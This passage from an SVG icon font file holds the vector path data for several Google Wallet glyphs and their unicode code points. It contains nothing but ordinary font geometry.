27-2 54-4 81-7 26-3 52-6 77-10 31-4 62-9 93-14l29-5c-56 26-116 42-176 57z m-652 70c-33 10-55 32-67 64-18 45-17 90 3 134 12 27 32 45 59 55 43 15 85 15 126-3 25-11 41-32 52-57 8-21 12-42 12-64 1-6 0-11 1-16 0-3-1-4-4-4-30 0-60 0-90 0-30 0-59 0-89 0-4 0-5-1-5-5-1-32 23-51 44-55 13-2 26-2 38 1 12 3 20 12 25 23 1 3 2 4 5 4 23-1 46-1 69-1 3 0 4-1 3-5-14-35-37-61-74-71-37-11-72-10-108 0z m494 108c4 0 6 1 8 5 4 12 8 25 15 37 8 17 19 22 38 20 13-2 21-10 23-22 1-10 0-20 0-30 1-18 1-18-16-22-17-5-34-7-50-11-11-2-22-6-30-15-10-11-12-25-11-39 1-12 6-23 16-31 21-16 55-15 75 2 7 6 12 14 16 22 0-9 1-17 0-26 0-3 1-4 4-4 13 0 27 0 41 0 2 0 3 1 3 4 0 3 0 5-4 4-3 0-5 0-7 0-5 0-6 1-6 5 0 42 0 84 0 126 0 9-3 18-9 25-10 11-22 16-35 19-25 4-48-1-71-10-1-1-2-2-2-3v-53c0-1 0-2 2-3z m84-36c1-13 0-29-6-43-6-13-15-24-30-27-6-1-12-1-18 1-8 2-13 8-15 16-4 13-4 25 0 38 2 10 9 16 18 20 8 3 15 5 23 6 9 2 17 5 24 8 3 1 5 2 4-3 0-4 0-9 0-16z m-574 82c17 0 33 0 50 0 16 0 33 1 49 0 4 0 5 1 4 4 0 8-2 15-6 22-12 19-37 30-59 25-24-4-41-24-42-47 0-3 1-4 4-4z" />
<glyph glyph-name="google-wallet-alt-1" horiz-adv-x="1000" unicode="&#xecd2;" d="M847 696h-694c-84 0-153-69-153-154v-384c0-85 69-154 153-154h694c84 0 153 69 153 154v384c0 85-69 154-153 154z m-424-461l0 2c0 3-1 6-2 9 0 1 0 2 0 3-1 2-1 5-2 8l-1 3c-1 2-1 5-3 7l-1 3-2 7-2 2c0 3-1 5-3 7l-1 3c-1 2-2 4-3 6-1 1-1 1-2 2-1 3-2 5-4 7l-1 2c-1 2-3 4-4 5-1 1-1 2-2 2-1 2-2 4-4 6-1 0-1 1-2 2-1 2-3 4-5 5l-2 2c-1 2-3 4-5 5l-2 2c-1 1-3 3-5 4-1 1-1 1-2 2-2 2-4 3-6 4-1 1-2 1-2 2-2 1-4 3-6 4l-2 1-7 4-2 1-5 5-2 2c-3 5-5 10-7 15v10c1 2 1 4 2 6 2 8 8 14 14 18l1 1 0 0c1 0 1 0 2 1v0c1 0 2 1 4 1 0 0 0 0 0 1l11 1c1 0 3 0 4 0l8-3 2 0c2-2 4-3 7-4 0-1 1-1 2-2l6-3c1-1 2-1 3-2l5-4c1 0 2-1 3-1 2-2 3-3 5-4l2-2 6-4 2-2c2-1 4-3 6-4l1-2c2-2 4-3 6-4l2-2 5-5 2-2 4-5 2-3 7-7c2-5 2-10 2-15 3-30-3-58-16-84-3-7-8-13-10-21-1 1-1 1-1 2z m101 77c-1-4-1-8-1-12l-1-8c-1-1-1-3-1-4-1-4-2-8-2-12l-1-5-4-14c-1-1-1-2-1-4-1 0-1 0-1-1l-5-15c-2-2-3-4-3-7l-10-19h0l-1-2-5-7-6-6-7-4c-4-2-8-3-13-3h-3c-3 0-6 1-9 1-1 1-2 1-3 1l-6 3c0 1-1 2-2 2l-5 4-1 3-5 7c0 0 0 1 0 1l-2 9 0 3 1 11c3 7 7 13 10 20 13 27 19 55 16 84 0 5 0 10-2 15 0 4-1 8-2 12l-1 3-2 8c0 1-1 2-1 2-1 3-2 5-3 8 0 1-1 2-1 3-1 2-2 4-3 6 0 1-1 2-1 2-1 3-2 5-4 7 0 1 0 2-1 2l-4 7c0 1 0 2-1 3l-1 8v3c0 5 1 9 2 13l4 6 0 1c1 0 1 1 1 1l0 0 1 1 5 5 2 1 0 1 6 2c0 1 1 1 1 1v0c4 1 8 2 12 2h3c3 0 6-1 9-1l2-1c2-1 4-3 7-4 0 0 1-1 2-1 1-2 3-4 5-5 0 0 0-1 1-1 12-20 21-41 27-63 6-24 9-48 8-73z m17-59c-1 2-1 5-2 8l-1 3c0 2-1 5-2 8 0 1 0 2-1 2 0 3-1 5-2 8 0 1-1 2-1 3-1 2-2 5-3 7l-1 2-2 6c0 4 1 8 1 12 1 25-1 49-8 73-6 22-15 43-27 63l2-1c1-1 3-2 5-4 1 0 1-1 2-1 2-2 4-3 6-5l2-1c1-2 3-3 5-5l2-1 6-5 2-2 5-5 1-1 6-6 1-2c2-1 3-3 5-5l2-2c2-2 3-4 5-5 0-1 1-2 1-2 2-2 3-4 5-6 1 0 1-1 2-2l4-5c2-3 4-6 6-9 9-53 2-104-19-153-1-2-2-3-2-4l-1 10c0 1 0 2-1 3 1 3 0 6-1 9l0 3c0 3-1 6-2 9 1 1 0 2 0 3z m102 4c-1-2-1-4-1-5-1-4-2-8-3-12-1-2-2-4-2-6-2-5-3-10-5-15l-1-5c-2-5-4-10-6-15-1-2-2-4-2-6-1 0-1-1-1-1-3-7-6-13-10-19 0-1 0-1 0-1l-1-1-7-7-1-1v0c-6-3-13-6-20-7-10 0-20 3-28 9l-2 1-4 6c-1 1-1 1-2 2l-3 7-1 2c0 3-1 6-1 9l0 4c1 5 3 10 5 15 1 1 2 3 2 5l0 0c1 2 2 3 2 4 22 49 28 100 20 153 0 5-1 9-3 13 0 3 0 6-2 9 0 1 0 1 0 2-1 3-1 5-2 8 0 1-1 2-1 3-1 3-1 5-3 8l0 2c-1 3-2 5-3 7 0 1-1 2-1 3-1 3-2 5-3 7l-1 3c-1 2-2 5-3 7 0 1-1 2-1 2l-3 7c0 1-1 2-1 3-1 2-2 5-2 8l0 3c0 4 0 8 2 12 0 2 1 3 1 5 6 10 14 16 26 19 1 0 2 0 3 1h11c5-1 11-3 15-5l2-2 5-4 3-3c1-1 3-3 4-5l1-3 3-6c1-1 1-2 1-3l3-6 2-2c0-3 1-6 2-8 1-1 1-1 1-2 1-3 2-5 3-8l1-2 3-8c0-1 0-2 1-2l2-8 1-3c0-3 1-5 2-8 0-1 0-2 1-3l2-8 0-3 2-8 1-3c0-1 0-2 0-3 2-12 4-25 4-38 2-32-1-63-7-94z" />
<glyph glyph-name="google-wallet-alt-2" horiz-adv-x="1000" unicode="&#xecd3;" d="M847 696h-694c-84 0-153-69-153-154v-384c0-85 69-154 153-154h694c84 0 153 69 153 154v384c0 85-69 154-153 154z m-233-265c4-1 7-4 8-8 1-1 1-2 0-2l-16-6c-2-1-3-1-5-1-1 0-2-1-1-2 3-10 12-16 22-11 0 0 1 0 1 0-5-7-13-7-19-5-6 2-11 9-11 16-1 12 9 21 21 19z m-23 18c-3-2-4-4-4-6-1-14 0-28 0-42 0-2 1-3 3-3l3 0 0-1c-5-3-10 0-15-1 2 2 1 6 1 8 0 14 0 27 1 41 0 1 0 1-2 1-1 0-2 0-3 0 3 3 7 4 16 3z m-110-18c10 0 18-8 18-18 0-10-9-18-20-18-10 0-18 8-18 18 0 10 9 18 20 18z m-53 14c9 2 18 1 26-4 2-1 2-1 1-2-2-2-4-5-7-5 1 3 1 3-1 5-7 5-14 6-21 2-7-3-10-9-11-16-1-14 8-26 21-28 4 0 7 0 11 1 1 0 2 1 2 2 0 3 0 5 0 8 0 1 0 2-2 2-3-1-6-1-8-1 2 2 4 4 7 4 4-1 8 0 13 0-5-4-2-9-3-13 0-2 0-3-2-3-6-1-12-2-17-3-15-1-27 7-29 22-3 13 6 26 20 29z m-234-167l0 2c0 2 0 4-1 6l0 2c-1 3-1 5-2 7l-1 2c0 2 0 4-1 5l-1 3-2 5c0 0-1 1-1 2-1 2-2 3-3 5 0 1 0 1-1 2 0 2-1 3-2 5l-1 1c-1 2-2 4-3 5l-1 2c-1 1-2 3-3 4l-1 1c-1 2-2 3-4 4 0 1-1 1-1 2-1 2-2 3-4 4l-1 2c-2 1-3 2-4 3l-1 1c-2 2-3 3-5 4l-1 1c-1 1-3 3-5 4l-1 1c-2 1-3 2-5 3l-1 1-5 2-2 1-4 4c0 0-1 1-1 2-3 3-4 7-5 11v8c1 1 1 3 1 4 2 6 6 10 11 14l1 1v-1c0 0 1 1 1 1l3 1c0 0 0 0 0 1l8 0 3 0 6-1 1-1c2-1 4-2 6-3 0 0 1 0 1-1l5-3 2-1c1-1 3-2 4-3 1 0 1-1 2-1l4-3 2-1c1-1 3-2 4-3 1-1 1-1 1-1 2-2 3-3 5-4l1-1c1-1 3-2 4-3 1-1 1-1 2-2 1-1 2-2 3-3l2-2c1-1 2-2 3-4 1 0 1-1 2-2l5-5c1-4 1-8 2-12 1-22-3-43-13-63-2-5-5-10-7-15l-1 0z m75 49c0-2 0-4 0-6-1-1-1-2-1-3 0-3-1-6-2-9l0-4c-1-3-2-6-3-10-1-1-1-2-1-3 0 0-1-1-1-1l-4-11c-1-2-1-4-2-5l-8-15h1l-1-1c-1-2-3-4-4-6l-4-4-6-4c-3-1-6-2-9-2h-3l-6 1-2 1-5 2c0 1-1 1-1 1-2 2-3 3-4 4l-1 2-4 5c0 0 0 1 0 1-1 2-1 4-2 6 0 1 0 2 0 3l1 8c2 6 6 10 8 16 10 20 14 41 12 63 0 4 0 7-1 11-1 3-1 6-2 9l-1 2c0 2-1 4-1 6 0 1-1 2-1 2 0 2-1 4-2 6l-1 2c-1 2-1 3-2 5 0 0-1 1-1 1-1 2-2 4-3 6 0 0 0 1-1 1-1 2-2 4-3 5l0 3-2 5v3c1 3 2 6 2 9l3 5 0 1c1 0 1 0 1 1l0 0c0 0 0 0 1 0l4 4 1 1 0 0 4 3c1 0 1 0 1 0v0c3 1 6 1 9 2h3l6-2c1 0 1 0 2 0l5-3c0-1 1-1 2-1 1-1 2-3 4-4l0-1c9-14 16-30 21-47 4-18 6-36 5-55l-1-9z m14-35l-1 6-1 2c0 2-1 4-1 6 0 1 0 1-1 2 0 2-1 4-2 6l-1 2c0 2-1 4-2 5l0 2c-1 1-1 3-2 4 0 3 1 6 1 9 1 19-1 37-6 55-5 17-12 33-21 47 1 0 1 0 1 0 2-1 3-2 5-3 0 0 0-1 1-1 1-1 3-2 5-4 0 0 1 0 1-1 1-1 3-2 4-3 1 0 1-1 1-1l4-4 2-1c1-1 3-3 4-4l1-1c1-1 3-3 4-4l1-1c1-2 3-3 4-4l1-2c1-1 3-3 4-4 0 0 1-1 1-1 1-2 2-3 4-4l1-2 3-4 5-7c6-40 1-78-15-115 0-1-1-2-1-3l-1 7c0 1 0 2 0 2 0 3-1 5-1 8l0 2c-1 2-1 4-1 6 0 1-1 2-1 3z m77 2l-1-3-2-9-1-5-4-11-1-4c-1-4-3-7-4-11-1-2-2-3-2-5-1 0-1 0-1-1-2-5-4-10-7-14 0 0 0 0 0-1l-1 0-6-6c0 0 0 0 0 0v0c-5-3-10-5-15-5-8-1-15 2-22 6l-1 1c-1 2-2 3-3 4l-1 2-3 5 0 2-1 7 0 3c1 3 2 7 4 10 0 2 1 3 1 4l0 1 2 3c16 37 21 75 15 115-1 3-1 6-2 9 0 3-1 5-2 7l0 2-2 6 0 2c-1 2-1 4-2 6 0 1-1 1-1 2 0 1-1 3-2 5l0 2c-1 2-2 4-3 6l0 2c-1 2-2 4-3 5 0 1 0 1-1 2l-2 5-1 2-1 6 0 3c0 3 0 6 1 8l1 4c5 7 11 13 20 15 1 0 2 0 2 0h9c3-1 7-2 11-4l1-1c2-1 3-2 4-3l2-2c1-1 2-3 3-4 0-1 1-2 1-2 1-2 1-3 2-5 1 0 1-1 1-2l3-5 0-1c1-2 2-4 3-6 0-1 0-1 0-2l2-5 1-2 2-6c0-1 0-1 1-2 0-2 1-4 1-6l1-2c0-2 1-4 2-6 0 0 0-1 0-2 1-2 1-4 2-6 0-1 0-1 0-2l1-7 1-2c0 0 0-1 0-2 2-9 3-19 3-28 2-24 0-48-5-72z m172 59c-8-32-15-64-22-97-2-6-6-5-10-5-7-1-10 1-11 9-5 24-11 49-16 73-1 3-2 5-4 8-3-14-6-28-9-41-4-15-7-29-10-43-1-9-7-6-12-6-5-1-7 1-8 6l-21 94c-1 2-4 7 2 7 3 0 9 3 11-4 3-19 7-37 11-55l7-31 2 0c6 28 12 55 17 83 2 7 6 7 11 7 7 1 9-2 11-8 5-27 12-55 18-83 3 3 3 7 3 11 6 24 11 49 16 73 1 6 8 10 13 7 2-1 1-3 1-5z m-13 42c-10 0-18 8-18 18 0 10 9 18 20 18 10 0 18-8 18-18 0-10-9-18-20-18z m23-4c4 4 9 4 14 5 0 0 1 0 2 0-2 2-3 5-2 7 0 1 0 1-1 1-2 0-3 0-5 0-4 2-7 5-8 10-1 5 1 9 5 13 3 2 7 3 10 3 6 0 12 0 18 0-2-2-5-3-8-3 0-1 1-1 1-1 5-6 4-13-1-18-1-1-2-2-3-3-2-1-1-3 0-5 2-1 4-3 5-4 7-6 7-14 0-19-7-5-19-6-26-2-6 4-7 11-1 16z m79-140c-6-1-12-1-11 10-11-11-23-14-36-12-19 4-28 18-27 39 1 17 13 29 31 30 9 1 18 1 27-2 4-1 5 0 5 4l0 7c-1 9-2 17-11 20-11 3-21 4-31-4-3-2-5-6-6-9 0-4-2-4-5-4-9 1-9 1-6 9 4 11 13 18 24 21 8 2 16 1 24-1 15-3 23-14 23-31 1-19 0-37 1-56 0-3 0-7 0-11-1-3 5-8-2-10z m31 0c-5 0-6 1-6 6 0 47 0 94 0 141 0 4 2 6 6 6s7-2 7-7c-1-23 0-46 0-70 0-23-1-47 0-70 0-5-2-6-7-6z m39 0c-5 0-7 0-7 6 0 47 0 94 0 141 0 5 2 6 7 6 5 0 6-2 6-6 0-24 0-48 0-71 0-24 0-47 0-70 0-5-1-6-6-6z m42 27c4-12 13-18 26-17 10 0 18 7 21 19 1 8 4 8 10 7 4-1 4-2 4-5-3-18-15-31-31-33-20-3-35 5-42 23-8 22-8 45 1 67 6 15 17 22 33 22 15 0 26-7 33-21 5-10 6-22 6-33 0-4-1-5-5-5-9 0-18 0-27 0-10 0-19 0-28 0-4 0-5-1-5-4 1-7 2-14 4-20z m118 69c-6 0-11 0-17 0-4 0-5-1-5-5 0-7 0-13 0-19 0-16 0-33 0-49 0-10 3-13 14-12 3 0 5 3 8 0v-10c-7-3-13-2-20-2-9 1-14 8-14 20-1 22-1 44-1 66 0 10 0 10-9 11-5 0-5 2-5 5 0 4 0 7 5 6 9-1 10 3 10 10-1 5-1 10-1 15 0 11 0 11 13 14 0-11 0-22 0-33 0-5 1-6 6-6 5 0 10 0 16 0v-11z m-286 66c0 4-1 8-4 11-1 2-3 3-5 3-5 1-8-2-8-8 0-4 2-8 4-10s5-3 8-2c3 1 5 3 5 6z m4-28c-1 4-7 9-11 9-4 0-7-1-9-2-5-3-6-10-1-13s11-4 16-2c4 2 5 5 5 8z m-53 43c-4-1-7-4-7-8-1-5 0-11 2-15 3-6 8-9 13-8 4 2 7 6 7 13 0 5-1 10-5 15-2 3-6 4-10 3z m-26-24c1 2 1 4 1 6 0 5-1 10-4 14-2 3-5 5-10 4-4 0-7-3-8-7-1-8 0-15 5-21 5-5 14-3 16 4z m123 16c2 1 3 2 1 4-1 4-5 5-9 4-4-2-6-5-6-10v-1c0-3 0-3 3-2 3 2 7 3 11 5z m-12-115c-8 2-16 3-25 1-10-2-16-9-17-20 0-12 5-21 14-24 19-7 37 7 37 27 0 2 0 3 0 5 1 7-2 10-9 11z m133 9l21 0h16c11 0 11 0 9 10-4 18-14 26-28 24-13-1-26-20-23-32 1-3 3-2 5-2z" />
<glyph glyph-name="google-wallet-alt-3" horiz-adv-x="1000" unicode="&#xecd4;" d="M331 410c0 1 0 2 0 3 0 1 0 2-1 3l-1 9-1 3-2 8c-1 1-1 2-1 3-1 3-2 6-2 9 0 1-1 2-1 3l-2 7-2 3c0 3-1 5-2 8l-1 2c-1 3-2 6-3 8l-1 3c-1 2-2 5-3 7 0 1-1 2-1 2-1 3-2 5-3 7l-1 3-3 6c-1 1-1 2-2 3l-4 6c-1 1-2 2-2 3l-6 4c0 0-1 1-2 1-5 3-10 4-15 6h-11c-1-1-3-1-4-1-12-3-20-10-26-20l-2-5c-1-4-2-8-2-12 0-1 0-2 0-3l2-9 1-3 3-7c1 0 1-1 1-1 2-3 3-6 4-8l1-3c1-2 2-5 3-7l1-3c1-3 2-5 3-8l0-2c2-2 2-5 3-8l1-3c1-3 1-6 2-8l0-2c2-3 2-6 2-10 2-4 3-8 3-13 9-54 2-107-20-158-1-1-2-2-2-4l-1 0c0-2-1-3-2-5-2-5-4-10-5-15l0-4 1-9 1-3 4-7 1-2 5-6 1-1c9-7 19-10 30-9 7 0 14 3 20 7v0l1 0c2 3 5 5 8 8l0 1c0 0 0 0 0 0 4 7 7 13 11 20 0 1 0 1 0 1 1 3 2 5 3 7l6 15 1 6 5 15c1 2 1 4 2 6l3 12 1 5c7 32 9 65 8 97-1 13-2 26-5 39z m-307 29z m106-81c0 5-1 10-2 15-2 3-5 5-7 8-1 1-2 2-2 3-2 1-4 3-5 5-1 0-2 1-2 2l-5 5-3 2c-2 1-4 3-5 5l-2 1c-2 2-4 3-6 5 0 1-1 1-1 1l-6 5c-1 1-2 1-3 2l-5 4-3 2-6 3-2 2-7 4c0 0-1 1-2 1-2 1-5 3-7 4l-2 1c-3 1-6 2-8 2l-4 0-11-1c0 0 0 0-1 0l-4-2v0c0 0-1 0-1 0l0 0c0 0-1-1-1-1-7-5-12-11-15-19-1-2-1-4-2-6v-10c2-6 4-11 7-16l2-2c2-2 4-3 6-5 0 0 1-1 2-1 2-2 4-3 6-4l3-2c2-1 4-2 6-4l2-1c2-1 4-3 6-5 1 0 2-1 2-1 2-2 4-3 6-5l1-2c3-1 4-3 6-5 1-1 1-1 2-2 2-1 4-3 5-5l2-2c2-2 3-4 4-6l2-2c1-2 3-4 4-6 0 0 1-1 1-2 2-2 4-4 5-7 0-1 1-1 1-2 2-2 3-4 4-6l1-3c1-2 3-5 3-7l2-3 2-6 1-4c1-2 2-5 3-7 0-1 0-3 0-4 1-2 2-5 3-8l0-3c1-3 2-6 2-9 0-1 0-1 0-2 0-1 0-1 1-1 2 7 7 14 10 21 14 27 19 55 17 86z m96-100l0-3c1-3 1-6 1-10 1 0 1-1 0-2l1-11c1 2 2 3 2 4 22 51 29 104 21 158l-7 10-4 5c-1 1-1 2-2 2-2 2-3 4-5 6 0 0-1 1-1 2-2 1-4 3-5 5-1 1-1 2-2 3-2 1-4 3-5 5l-2 2-5 5-2 2-5 5-2 2-6 5-2 1c-2 2-4 3-6 5l-1 1c-2 2-5 3-6 5-1 0-2 1-2 2-3 1-4 2-6 4-1 0-1 0-2 0 13-20 22-42 29-65 6-24 9-49 7-75 0-4 0-8-1-12l3-6 1-2c1-3 2-5 2-8l2-3c0-2 2-5 2-7 0-1 1-2 1-3 1-3 1-6 2-9 0-1 1-2 1-3l1-8c1-1 1-2 1-3 1-3 1-6 2-9z m-31 13z m-25 200l-1 1c-2 1-3 3-5 5-1 0-2 1-2 2l-7 3-3 1-9 2h-3c-4 0-8-1-12-2v0c0-1-1-1-2-1l-5-3-1 0-1-1-6-6c0 0 0 0 0-1l0 0c0 0-1-1-1-1 0 0-1 0-1-1l-3-7c-2-4-3-8-3-12v-4l1-8 1-3 4-7c1 0 1-1 1-2 2-2 3-4 4-7 1-1 1-1 1-2 2-2 3-5 3-7l2-3c1-2 2-5 2-8 1 0 1-1 1-2l3-8 0-3c2-4 2-9 3-13 1-5 2-10 2-15 3-30-3-59-16-87-4-7-8-13-11-21-1-3-1-7-2-11 1-1 1-2 1-3l2-9c0 0 0-1 0-1 2-3 3-5 5-8 0 0 1-1 2-2 1-1 3-3 5-5 1 0 1 0 2-1l6-3 3-1 9-2h4c4 1 8 2 12 3l8 4 6 6c2 3 3 6 5 8l1 2h0c3 6 7 13 10 20 1 2 2 5 3 7 2 5 4 10 6 15 0 1 0 2 0 2 0 1 1 3 2 4 1 5 2 9 3 14 1 2 1 3 1 5l3 13c0 1 0 2 1 4 0 3 0 5 1 8 0 4 0 8 1 12 1 26-2 51-8 75-6 23-16 45-28 65z m807-125c7-1 15-1 23-1v16c-7 0-15 0-22 0-6-1-8 2-8 8 0 15 0 30 0 45-17-4-17-4-17-19 0-7 0-13 0-20 1-10-1-16-13-14-7 1-7-3-7-8 0-5 1-7 7-8 13 0 13-1 13-14 0-31 0-61 0-91 0-16 7-25 20-27 9-1 18-1 27 2v15c-4 3-7 0-10 0-15-2-20 2-20 16 0 22 0 44 0 66 0 9 0 18 0 26 0 6 1 8 7 8z m-363 41c10 7 10 18 1 26l-7 5c-2 3-2 5 0 8 1 1 3 2 4 4 7 6 8 16 1 23 0 1-1 1-1 3 4-1 8 0 11 4-8 0-16 0-24-1-5 0-10-1-14-4-6-5-9-11-8-18 2-7 6-11 12-13 2 0 4-1 6 0 2 0 2-1 2-2-1-3 0-6 2-9-1 0-2 0-3 0-6-1-13-2-19-7-8-6-7-17 2-22 10-5 27-4 35 3z m-22 43c-3 4-5 9-6 15 0 7 4 11 11 11 3 0 5-2 7-5 3-4 5-9 5-15-1-4-3-7-7-9-3-1-7 0-10 3z m-5-23c3 2 7 3 12 3 6 0 14-7 15-12 1-5-1-9-6-11-7-3-15-3-22 2-7 5-6 14 1 18z m-153 3c8 1 15 2 23 4 3 1 3 2 3 4 1 6-2 12 4 18-6 0-12-1-18 0-4 0-6-3-10-4 4-1 8 0 11 0 3 0 3-1 3-3 0-3 0-7 0-10 0-2-1-3-3-3-5-2-9-2-14-1-19 3-30 18-29 37 1 11 5 19 15 23s20 4 28-3c4-3 4-3 2-7 5 0 6 4 9 6 3 2 2 3 0 4-12 6-24 8-36 5-19-4-31-22-28-40 3-20 19-32 40-30z m114 51c-15 0-27-11-27-25 1-14 11-25 26-25 15 0 26 11 26 26 0 13-11 24-25 24z m4-46c-6-2-13 2-16 10-4 6-5 13-4 21 1 6 4 9 10 11 6 2 10 0 14-5 5-6 6-13 7-19 0-11-4-16-11-18z m10-54c-6 4-16-1-18-9-7-34-13-67-20-101-1-4-1-10-6-14-8 38-17 76-24 113-2 9-5 12-14 11-8 0-13 0-15-10-8-38-17-75-25-113-1 0-2 0-2 0l-10 43c-5 24-10 49-15 74-2 11-10 6-15 6-8 0-4-6-3-9 10-43 20-86 29-130 2-6 5-9 11-8 7 1 15-3 17 9 3 19 8 38 13 58 4 19 9 37 13 56 3-3 4-6 5-10 7-33 15-67 22-100 2-11 6-14 15-13 6 1 11-1 13 8 10 44 20 88 30 133 1 2 2 4-1 6z m-70 50c15 0 26 11 26 25 0 14-10 25-24 25-15 0-27-11-27-25 0-14 10-25 25-25z m-14 36c1 6 5 9 11 10 6 1 10-1 13-6 4-6 6-13 6-20 0-2 0-4-1-7-3-10-15-13-22-5-7 8-9 18-7 28z m185-35c8-2 19-1 26 7-1 0-1 0-1 0-15-7-27 1-31 16-1 2 0 2 2 2 2 1 4 0 6 1 7 3 14 6 22 9 1 0 1 1 1 3-2 5-7 9-12 10-16 4-30-9-29-26 0-10 7-19 16-22z m1 44c5 2 10 0 13-4 1-3 1-5-2-6l-16-7c-3-1-3-1-3 2v1c0 8 3 12 8 14z m-37 26c2 0 3-1 3-3-1-18-1-36-1-54 0-4 1-9-3-12 7 1 15-2 21 1l0 1c-1 0-3 1-4 1-3 0-4 1-4 4 0 19-1 38 0 57 1 3 1 6 5 8-11 2-18 1-21-3 1 0 3 0 4 0z m61-254c1 5 0 11 0 16 0 25 0 50 0 76-1 23-11 38-33 43-10 2-22 3-33 0-15-4-26-13-32-28-5-11-4-11 7-13 5 0 7 1 8 5 1 6 4 10 9 14 12 10 26 10 41 5 12-5 15-16 15-27 0-4 0-7 0-11 1-5-1-6-6-5-12 4-25 5-37 4-24-3-42-19-43-41-2-30 12-49 37-54 18-3 34 2 49 16-1-14 7-16 15-14 10 3 2 10 3 14z m-17 45c-1-2-1-4-1-6 0-28-24-47-50-38-13 5-20 17-19 34 1 14 10 25 24 27 11 3 22 1 34-1 9-2 13-6 12-16z m169 11c13 0 26 0 38 0 13 0 25 1 38 0 5 0 7 2 7 7-1 16-2 31-9 45-9 20-25 29-45 29-21-1-37-10-45-30-12-30-12-61-1-91 9-25 30-36 57-32 22 2 38 20 42 45 0 4 0 6-5 7-8 2-13 1-15-9-3-17-14-26-28-27-17-1-29 7-36 23-3 9-4 18-5 27 0 5 2 7 7 6z m24 64c20 2 34-9 39-33 2-15 2-15-12-15h-22c-10 0-19 0-29 0-2 0-5-1-6 3-4 16 13 43 30 45z m-75-30c0 32 0 65 0 97 1 6-1 9-8 9-6 0-9-1-9-9 0-64 0-128 0-192 0-8 3-9 9-9 7 0 8 2 8 9 0 31 0 63 0 95z m-52 1c0 32 0 64 0 96 0 6-2 9-8 9-7 0-9-2-9-9 1-64 0-128 0-192 0-7 2-9 9-9 6 0 8 2 8 9 0 32 0 64 0 96z" />
<glyph glyph-name="google-wallet" horiz-adv-x="1000" unicode="&#xecd5;" d="M966 409c-2 36-7 73-13 109 0 2 0 5-1 8l-1 8-5 25c-1 2-1 5-2 7l-5 24c-2 2-2 5-3 8-3 7-5 15-6 23l-3 8-6 22c-1 2-2 5-3 8-2 7-4 14-7 21l-2 7c-3 7-6 15-9 22l-2 6c-4 7-7 14-9 21-1 2-2 5-3 7l-8 19-4 8-8 17-4 8-11 16c-3 2-5 5-8 8-4 4-9 8-14 11l-5 4c-14 8-29 12-44 16h-31c-3-3-6-2-10-3-33-7-56-27-73-56l-5-13c-4-11-5-22-6-33 0-4 0-7 0-10l6-24 4-7c2-7 5-13 8-20 2-1 2-3 2-5 5-7 8-14 11-22l2-6c4-7 7-14 8-22 2-2 3-5 4-7 3-7 5-14 7-22 0-1 1-3 2-5 3-8 6-16 7-24l3-8c2-8 4-16 6-23l1-6c4-8 5-17 6-26 4-11 6-23 7-35 23-152 5-299-57-440-1-4-4-7-6-11l0 0c0-6-4-11-6-16-6-13-11-27-13-41l-1-12c1-8 2-17 3-25 1-3 2-5 3-8l9-19 4-6 14-16 4-3c24-18 51-28 81-26 21 2 39 9 57 20l0-1 2 3 21 21 2 3c0 0 0 1 1 1 11 17 19 36 29 54 0 2 0 3 2 4 1 7 4 13 7 18l16 43 5 16 13 41 5 18 8 34c1 5 2 9 3 14 19 89 26 179 21 270z m-867 189c0 0 0 0 0 0l0 0z m294-226c-1 14-2 28-5 42-7 7-13 15-20 22l-6 7-13 14-6 6-14 14c-2 2-4 4-6 5-6 4-11 9-15 14l-5 4c-6 4-12 8-17 14-1 1-3 2-4 3l-17 13c-2 2-4 3-7 5-5 4-10 7-15 11-2 1-5 3-8 5l-15 10-8 5-18 11c-2 1-4 2-6 3-7 3-13 7-20 12l-5 2c-8 2-15 4-23 6l-10 1c-10-1-21-2-31-3 0-2-1-2-2-2l-12-4v0c-1-2-2-2-4-2l1 0-3-2c-19-13-35-30-42-53-2-5-1-12-5-17v-27c5-16 11-31 20-45 2-2 4-4 6-6l14-13c2-1 4-3 6-4l19-11 6-4c6-2 12-7 17-11l6-4c7-3 13-8 18-13 2-2 4-3 5-4 6-4 12-9 16-14 1-1 3-3 4-4 6-3 11-9 16-14 2-2 3-4 5-6 6-4 10-9 14-15l6-6c4-5 9-9 12-15l4-6c5-5 9-10 12-16l4-6c5-6 9-12 12-19l4-6c4-5 7-11 9-18 2-2 3-5 4-7 4-6 8-13 9-20l4-8 7-17 3-10c4-7 6-14 7-21 1-3 2-6 3-9 3-7 4-15 5-23l2-8c2-8 4-16 5-25 0-2 0-5 1-7 0-1 0-2 1-3 7 20 20 39 30 58 37 76 52 156 45 241z m266-278l2-8c2-9 3-18 2-27 2-2 2-5 2-8l2-29c2 4 4 8 6 11 61 141 80 288 56 440l-19 26c-4 5-8 10-12 15-1 2-2 4-4 6-5 5-9 10-13 16-2 1-4 3-4 5-6 5-10 10-14 16l-6 6c-5 4-9 9-13 14l-6 6-14 15-5 4c-5 5-10 9-15 14-2 1-4 3-6 5l-15 14-5 4c-6 4-12 8-16 14-2 1-3 2-5 3-6 4-12 9-17 14-3 1-4 2-6 4-6 3-11 7-16 12l-4 0c35-56 61-116 78-180 19-68 25-138 22-209 0-11-2-22-3-34l7-16 2-6c4-7 7-14 8-21l3-8c3-7 6-14 7-22 2-2 2-5 2-8 3-7 5-15 7-23 0-2 1-5 2-8l4-23c2-3 3-5 2-8 3-9 4-17 4-26z m-86 35z m-69 557l-2 4c-6 3-10 9-15 13-2 1-4 2-6 4l-19 11-6 2-25 5-10 0c-11-1-22-4-33-6l0 0c0-2-2-2-4-2l-16-8-1-2c-2-1-3-2-4-3l-15-14-3-3 1 0c-1-1-1-3-3-3l-1-2-11-20c-3-11-6-23-8-35v-10l5-22 3-9 10-19c2-2 3-4 4-6 4-6 8-12 10-19 2-2 3-4 4-7 4-5 6-12 8-18l4-9c3-6 6-14 7-21 3-2 3-5 4-8l6-21 2-9c4-11 5-23 7-35 4-14 5-28 6-43 7-84-8-164-46-240-9-20-22-38-29-59l-5-31 1-9 6-24c2-1 2-3 2-5l12-20 5-6 14-13c3-1 4-2 6-4 6-3 11-6 17-9l8-3c8-2 17-3 25-5h10c12 2 24 5 35 9 7 4 14 8 21 12l18 17c4 7 8 14 13 21l3 5h-1l30 56c1 7 4 14 8 20l16 42c-1 2 0 4 1 4 0 5 2 8 3 12l11 39 3 14 7 35c0 4 0 8 2 12l2 22c1 12 3 23 3 34 4 71-3 141-21 209-18 64-44 124-79 180z" />
